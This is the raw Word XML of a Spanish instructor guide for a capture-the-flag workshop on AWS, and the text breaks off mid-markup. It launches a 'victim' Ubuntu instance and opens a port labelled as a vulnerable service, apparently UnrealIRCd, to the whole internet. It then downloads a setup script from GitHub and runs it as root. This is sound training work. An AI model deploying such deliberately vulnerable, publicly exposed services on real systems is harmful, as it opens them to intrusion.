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6F470" w14:textId="31FE9409" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C0703">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="45B0E1" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="45B0E1" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>GUÍA DEL INSTRUCTOR - TALLER CTF EN AWS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CC4DA5" w14:textId="2A2E47A4" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C0703">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Resumen Rápido</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCB8E6F" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C0703">
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve">Instalación en </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3 pasos simples</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5523E37B" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C0703">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Lanzar EC2 Ubuntu 22.04 (sin user data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDAD780" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C0703">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>SSH a la instancia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528A1FF7" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C0703">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Ejecutar UN solo script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F9381A" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C0703">
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tiempo total: ~8 minutos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE9EA1A" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="00433E8C" w:rsidP="006C0703">
      <w:r w:rsidRPr="00A86A33">
        <w:pict w14:anchorId="3415FFAA">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC6CB2C" w14:textId="4393A15C" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C0703">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PASO 1: Crear la Instancia EC2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6D4E1F" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00D575E7">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.1 Lanzar Instancia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5ACDE9" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00D575E7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A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AWS Console → EC2 → Launch Instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059A2489" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00D575E7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A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configuración:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula4-nfasis2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1303" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1573"/>
        <w:gridCol w:w="3630"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C0703" w:rsidRPr="00A86A33" w14:paraId="2528FB81" w14:textId="77777777" w:rsidTr="00D57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85ACA" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C0703">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00A86A33">
              <w:t>Parámetro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="753FA1A4" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C07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6A33">
              <w:t>Valor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C0703" w:rsidRPr="00A86A33" w14:paraId="1F8C3FD0" w14:textId="77777777" w:rsidTr="00D5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53F22" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C0703">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00A86A33">
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B93C8D3" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C07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A33">
              <w:t>CTF-Victim-Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C0703" w:rsidRPr="00A86A33" w14:paraId="6E07ACB5" w14:textId="77777777" w:rsidTr="00D57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8DD76" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C0703">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00A86A33">
              <w:t>AMI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51D4DBF8" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C07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A33">
              <w:t>Ubuntu Server 22.04 LTS (64-bit x86)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C0703" w:rsidRPr="00A86A33" w14:paraId="24AC57C3" w14:textId="77777777" w:rsidTr="00D5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98002" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C0703">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00A86A33">
              <w:t>Instance type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B30A810" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C07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A33">
              <w:t>t2.micro</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C0703" w:rsidRPr="00A86A33" w14:paraId="4D417575" w14:textId="77777777" w:rsidTr="00D57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FA78A" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C0703">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00A86A33">
              <w:t>Key pair</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27BB087D" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C07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A33">
              <w:t>Crea o selecciona una existente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C0703" w:rsidRPr="00A86A33" w14:paraId="257F1533" w14:textId="77777777" w:rsidTr="00D5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3F65F" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C0703">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00A86A33">
              <w:t>User data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="414F97CB" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C07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A33">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>DEJAR VACÍO</w:t>
            </w:r>
            <w:r w:rsidRPr="00A86A33">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A86A33">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>⚠️</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="175CFFD3" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00D575E7">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.2 Security Group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CF0144" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00D575E7">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="348"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reglas de entrada (Inbound rules):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula4-nfasis2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1303" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1649"/>
        <w:gridCol w:w="880"/>
        <w:gridCol w:w="1727"/>
        <w:gridCol w:w="2139"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C0703" w:rsidRPr="00A86A33" w14:paraId="681D7766" w14:textId="77777777" w:rsidTr="00D57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06FB5" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C0703">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00A86A33">
              <w:t>Tipo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="617A6312" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C07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6A33">
              <w:t>Puerto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F378E18" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C07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6A33">
              <w:t>Origen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0152FF6C" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C07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6A33">
              <w:t>Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C0703" w:rsidRPr="00A86A33" w14:paraId="7AEC2A21" w14:textId="77777777" w:rsidTr="00D5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A617E" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C0703">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00A86A33">
              <w:t>SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AFAF11E" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C07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A33">
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3800FDA4" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C07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A33">
              <w:t>Tu IP o 0.0.0.0/0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="190F4C3B" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C07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A33">
              <w:t>Administración</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C0703" w:rsidRPr="00A86A33" w14:paraId="5E66A3E4" w14:textId="77777777" w:rsidTr="00D57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924C1" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C0703">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00A86A33">
              <w:t>Custom TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CA3E830" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C07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A33">
              <w:t>6200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="470F5EBE" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C07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A33">
              <w:t>0.0.0.0/0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33B268AE" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C07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A33">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Servicio vulnerable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C0703" w:rsidRPr="00A86A33" w14:paraId="47C62456" w14:textId="77777777" w:rsidTr="00D5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A4303" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C0703">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00A86A33">
              <w:t>All ICMP - IPv4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78D9941E" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C07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A33">
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E142E6C" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C07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A33">
              <w:t>0.0.0.0/0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7745B1E2" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C07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A33">
              <w:t>Permite ping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="176CCD30" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00D575E7">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.3 Launch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44086B07" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00D575E7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A86A33">
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Launch instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FEB50D" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00D575E7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A86A33">
        <w:t>Espera 1-2 minutos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73746E77" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00D575E7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A86A33">
        <w:t xml:space="preserve">Copia la </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IP pública</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BEB4A7" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="00433E8C" w:rsidP="005342F0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="60CAF3" w:themeFill="accent4" w:themeFillTint="99"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="4AFDDD6C">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33255A63" w14:textId="7BFB2028" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C0703">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PASO 2: Ejecutar el Script de Instalación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B095B23" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00D575E7">
      <w:pPr>
        <w:ind w:left="426"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1 Conectar por SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FA1904" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00D575E7">
      <w:pPr>
        <w:ind w:left="426" w:firstLine="282"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>ssh -i tu-llave.pem ubuntu@&lt;IP_PUBLICA&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459E9D59" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00D575E7">
      <w:pPr>
        <w:ind w:left="426"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2 Descargar el Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71073293" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00D575E7">
      <w:pPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Opción A: Desde URL (si lo subes a GitHub/S3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45247C1B" w14:textId="043BE484" w:rsidR="00D575E7" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00D575E7">
      <w:pPr>
        <w:ind w:left="426" w:firstLine="282"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">wget </w:t>
      </w:r>
      <w:r w:rsidR="00D575E7" w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://github.com/ancon2030/aws2025/raw/refs/heads/main/hacking/UnrealIRCd/script.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05558632" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00D575E7">
      <w:pPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Opción B: Copiar directamente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D09E75C" w14:textId="6626D101" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="00D575E7" w:rsidP="00D575E7">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidR="006C0703" w:rsidRPr="00A86A33">
        <w:t>nano setup_ctf.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A61D360" w14:textId="34369370" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00D575E7">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t># Pega el contenido del script</w:t>
      </w:r>
      <w:r w:rsidR="00B15D64" w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> Ctrl+X, Y, Enter para guardar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B52D90F" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00D575E7">
      <w:pPr>
        <w:ind w:left="426"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.3 Ejecutar el Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345E0524" w14:textId="7B4437D6" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="005342F0" w:rsidP="00D575E7">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidR="006C0703" w:rsidRPr="00A86A33">
        <w:t xml:space="preserve">chmod +x </w:t>
      </w:r>
      <w:r w:rsidR="00B15D64" w:rsidRPr="00A86A33">
        <w:t>script.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F8171D" w14:textId="22077A89" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00D575E7">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve">sudo bash </w:t>
      </w:r>
      <w:r w:rsidR="00B15D64" w:rsidRPr="00A86A33">
        <w:t>script.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699B6FA0" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00D575E7">
      <w:pPr>
        <w:ind w:left="426"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
